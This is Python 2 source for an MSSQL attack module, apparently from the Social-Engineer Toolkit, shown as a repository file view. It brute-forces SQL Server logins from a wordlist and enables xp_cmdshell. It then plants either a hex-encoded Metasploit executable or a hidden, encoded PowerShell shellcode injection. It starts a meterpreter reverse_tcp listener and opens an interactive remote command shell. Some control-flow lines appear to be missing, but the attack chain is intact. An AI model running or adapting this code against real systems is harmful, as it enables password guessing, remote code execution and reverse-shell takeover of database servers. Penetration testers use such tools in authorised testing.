2013-07-28 10:22:26 -04:00

317 lines
13 KiB

from src.core.setcore import *
from impacket import tds
import sys
import subprocess
import socket
import re
import os
import time
import binascii
import base64
import shutil
# this is the mssql modules
# define the base path
definepath = definepath()
operating_system = check_os()
msf_path = meta_path()
# this is the brute forcer
def brute(ipaddr,username,port,wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
ipaddr = str(ipaddr)
print "Attempting to brute force " + bcolors.BOLD + bcolors.ENDC + " with username of " + bcolors.BOLD + username + bcolors.ENDC + " and password of " + bcolors.BOLD + passwords + bcolors.ENDC
# connect to the sql server and attempt a password
if ":" in ipaddr:
#target_server = _mssql.connect(ipaddr, username, passwords)
ipaddr = ipaddr.split(":")
port = ipaddr[1]
ipaddr = ipaddr[0]
#target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
sql_server = tds.MSSQL(str(ipaddr), int(port))
# print that we were successful
#target_server = False
target_server = sql_server.login("master", username, passwords)
if target_server:
print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
counter = 1
# if login failed or unavailable server
except Exception, e:
# if we brute forced a machine
if counter == 1:
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
ipaddr = ipaddr[0]
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
if ipaddr != '':
print_warning("Unable to guess the SQL password for %s with username of %s" % (ipaddr,username))
return False
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
def deploy_hex2binary(ipaddr,port,username,password):
mssql = tds.MSSQL(ipaddr, int(port))
mssql.login("master", username, password)
print_status("Enabling the xp_cmdshell stored procedure...")
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except: pass
print_status("Checking if powershell is installed on the system...")
# just throw a simple command via powershell to get the output
mssql.sql_query("exec master..xp_cmdshell 'powershell -Version'")
bundle = str(capture(mssql.printRows))
# remove null byte terminators from capture output
bundle = bundle.replace("\\x00", "")
# search for parameter version - standard output for powershell -Version command
match ="parameter version", bundle)
# if we have a match we have powershell installed
if match:
print_status("Powershell was identified, targeting server through powershell injection.")
option = "1"
# otherwise, fall back to the older version using debug conversion via hex
print_status("Powershell not detected, attempting Windows debug method.")
option = "2"
# if we don't have powershell
if option == "2":
try: reload(src.core.payloadgen.create_payloads)
except: import src.core.payloadgen.create_payloads
print_status("Connection established with SQL Server...")
print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus ~./set
if os.path.isfile(setdir + "/set.payload"):
web_path = (setdir + "/web_clone/")
# then we are using metasploit
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
web_path = (setdir)
subprocess.Popen("cp %s/msf.exe %s/ 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
subprocess.Popen("cp %s//msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir,setdir), shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data =
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file(setdir + "/payload.hex", "w")
# if we are using metasploit, start the listener
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
except: import pexpect
print_status("Starting the Metasploit listener...")
msf_path = meta_path()
child2 = pexpect.spawn("%s/msfconsole -r %s/meta_config" % (msf_path,setdir))
# random executable name
random_exe = generate_random_string(10,15)
# next we deploy our hex to binary if we selected option 1 (powershell)
if option == "1":
print_status("Using powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = grab_ipaddress()
update_options("IPADDR=" + ipaddr)
port = raw_input(setprompt(["29"], "Enter the port for the reverse [443]"))
if port == "": port = "443"
update_options("PORT=" + port)
print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
try: reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
# create the directory if it does not exist
if not os.path.isdir(setdir + "/reports/powershell"):
os.makedirs(setdir + "/reports/powershell")
x86 = file(setdir + "/x86.powershell", "r")
x86 =
x86 = "powershell -nop -win hidden -noni -enc " + x86
print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
powershell_dir = setdir + "/reports/powershell/x86_powershell_injection.txt"
filewrite = file(setdir + "/reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lport %s\nset LHOST\nexploit -j" % (port))
# grab the metasploit path from config or smart detection
msf_path = meta_path()
if operating_system == "posix":
try: reload(pexpect)
except: import pexpect
print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("%s/msfconsole -r %s/reports/powershell/powershell.rc" % (msf_path,setdir))
# assign random_exe command to the powershell command
random_exe = powershell_command
# next we deploy our hex to binary if we selected option 2 (debug)
if option == "2":
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
print_status("Deploying initial debug stager to the system.")
random_file = generate_random_string(10,15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
print_status("Deploying stager payload (hex): " + bcolors.BOLD + str(print_line) + bcolors.ENDC)
mssql.sql_query("exec master..xp_cmdshell '%s>> %s'" % (line,random_file))
print_status("Converting the stager to a binary...")
# here we convert it to a binary
mssql.sql_query("exec master..xp_cmdshell 'debug<%s'" % (random_file))
print_status("Conversion complete. Cleaning up...")
# delete the random file
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file(setdir + "/payload.hex", "r")
while fileopen:
data =
# if data is done then break out of loop because file is over
if data == "": break
print_status("Deploying payload to victim machine (hex): " + bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
mssql.sql_query("exec master..xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
print_status("Delivery complete. Converting hex back to binary format.")
mssql.sql_query("exec master..xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
mssql.sql_query("exec master..xp_cmdshell '%s %s'" % (random_file, random_exe))
# clean up the old files
print_status("Cleaning up old files..")
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile(setdir + "/set.payload"):
print_status("Spawning seperate child process for listener...")
try: shutil.copyfile(setdir + "/web_clone/x", definepath)
except: pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/", shell=True)
# grab the port options
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if for some reason the port didnt get created we default to 443
port = "443"
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
try: reload(thread)
except: import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
print_status("Trigger the powershell injection payload.. ")
mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
if option == "2":
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(mssql.sql_query, (sql_command,))
# pause to let metasploit launch - real slow systems may need to adjust
# i need to rewrite this to do a child.expect on msf and wait until that happens
print_status("Pausing 15 seconds to let the system catch up...")
print_status("Triggering payload stager...")
# if pexpect doesnt exit right then it freaks out
if os.path.isfile(setdir + "/set.payload"):
os.system("python ../../payloads/set_payloads/")
# interact with the child process through pexpect
except: pass
except: pass
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
def cmdshell(ipaddr,port,username,password,option):
# connect to SQL server
mssql = tds.MSSQL(ipaddr, int(port))
mssql.login("master", username, password)
print_status("Connection established with SQL Server...")
print_status("Attempting to re-enable xp_cmdshell if disabled...")
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except Exception, e: pass
print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while 1:
# prompt mssql
cmd = raw_input("mssql>")
# if we want to exit
if cmd == "quit" or cmd == "exit": break
# if the command isnt empty
if cmd != "":
# execute the command
mssql.sql_query("exec master..xp_cmdshell '%s'" % (cmd))
# print the rest of the data
mssql.colMeta[0]['TypeData'] = 80*2